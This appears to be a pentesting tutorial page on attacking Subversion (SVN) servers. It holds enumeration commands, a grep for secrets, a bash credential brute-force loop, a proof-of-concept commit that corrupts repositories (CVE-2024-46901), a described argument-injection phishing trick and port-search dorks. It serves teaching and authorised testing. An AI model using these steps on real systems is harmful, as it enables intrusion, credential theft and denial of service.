---
title: "3690 - Svn"
weight: 3690
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **学习提示**: 本文档介绍 **3690 - Subversion SVN** 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

---

> ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

## 3690/tcp - 渗透测试 Subversion (SVN) 服务器

### 基本信息

**Subversion (SVN)** is a centralized **version control system** (Apache license) used for software versioning and revision control.

**默认 port:** `3690/tcp` (svnserve). It can also be exposed via **HTTP/HTTPS** through `mod_dav_svn` and via **svn+ssh**.

```text
PORT     STATE SERVICE
3690/tcp open  svnserve Subversion
```

#### Banner Grabbing

```bash
nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages
```

### 信息收集

```bash
## Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

## If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

## Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo
```

#### Auth & Misconfig Hunting

- `svnserve.conf` may allow `anon-access = read` (or even write). If you can list, try `checkout` to dump secrets, scripts, CI tokens.
- Repositories frequently store **build pipelines**, **deployment keys**, and **database credentials** in versioned config files. Grep the working copy after checkout: `grep -R "password\|secret\|token" -n .`.
- If svn+ssh is enabled, user shells often allow restricted `svnserve` commands; attempt `ssh user@host svnserve -t` with crafted subcommands to bypass wrappers.

#### Bruteforcing credentials (svnserve)

`sasl` authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:
```bash
for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done
```

### Recent Vulnerabilities (practical impact)

#### mod_dav_svn 拒绝服务 via control characters (CVE-2024-46901)

- A user with commit rights can write a path containing control chars (e.g. `\x01`, `\x7f`) that **corrupts the repository**, making later checkouts/logs fail and potentially crashing `mod_dav_svn` workers.
- Affects Subversion ≤ **1.14.4** when served through **HTTP(S)** (`mod_dav_svn`). Fixed in **1.14.5**.
- PoC commit with `svnmucc` (requires valid commit creds):
```bash
## create payload file
printf 'pwn' > /tmp/payload
## commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
```
- After the commit, normal clients may crash or refuse updates until admins manually remove the revision with `svnadmin dump/filter/load`.

#### Windows argument injection in svn client (CVE-2024-45720)

- On Windows, "best-fit" character encoding in `svn.exe` allows **command-line argument injection** when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.
- Affects Subversion ≤ **1.14.3** on Windows only; fixed in **1.14.4**. 攻击 surface: phishing a developer to run `svn` on an attacker-controlled URL/path.
- Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into `" & calc.exe & "`-style injected args, then trick the victim to run `svn status` or similar on that path.

### Notes for 漏洞利用 Workflow

1. **Check access method**: `svn://` (svnserve), `http(s)://.../svn/` (mod_dav_svn), or `svn+ssh://`.
2. **Try anonymous read** first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
3. **Enumerate hooks**: `hooks/pre-commit`, `post-commit` scripts sometimes contain plaintext credentials or hostnames.
4. **Leverage `svn:externals`** to pull additional paths from other hosts; list them with `svn propget svn:externals -R .` after checkout.
5. **Version leaks**: HTTP response headers from `mod_dav_svn` usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
6. If you obtain filesystem access to the repo, `svnadmin dump`/`svnlook author`/`svnlook dirs-changed` allow offline analysis without credentials.

---


### 搜索引擎语法

#### FOFA

```bash
# FOFA 搜索语法
port="3690"
```

#### Shodan

```bash
# Shodan 搜索语法
port:3690
```

#### ZoomEye

```bash
# ZoomEye 搜索语法
port:3690
```

---

## 📖 参考资料

- [HackTricks - 3690-svn](https://book.hacktricks.wiki/en/network-services-pentesting/3690-svn.html)